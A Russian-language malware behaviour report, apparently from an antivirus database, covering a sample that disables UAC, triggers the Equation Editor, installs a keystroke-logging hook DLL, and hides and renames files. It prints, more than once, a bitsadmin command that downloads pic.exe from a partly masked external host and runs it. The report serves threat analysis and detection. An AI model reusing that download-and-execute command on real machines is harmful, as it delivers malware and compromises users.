Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует:
- Средство контроля пользовательских учетных записей (UAC)
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download http://tu####der.com.tr.ht/pic.exe %temp%\Lo.Exe&%temp%\Lo.Exe
Устанавливает процедуры перхвата сообщений
о нажатии клавиш клавиатуры:
- Библиотека-обработчик для всех процессов: %TEMP%\ntdtcstp.dll
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bita86c.tmp
- %WINDIR%\vmpipe32.dll
- %TEMP%\ntdtcstp.dll
- %TEMP%\cmsetac.dll
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bita86c.tmp
Перемещает следующие файлы
- %TEMP%\bita86c.tmp в %TEMP%\lo.exe
Сетевая активность
Подключается к
- 'tu####der.com.tr.ht':80
TCP
Запросы HTTP GET
- http://tu####der.com.tr.ht/pic.exe
UDP
- DNS ASK tu####der.com.tr.ht
Другое
Создает и запускает на исполнение
- '%TEMP%\lo.exe'
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download http://tu####der.com.tr.ht/pic.exe %temp%\Lo.Exe&%temp%\Lo.Exe' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 /download http://tu####der.com.tr.ht/pic.exe %TEMP%\Lo.Exe
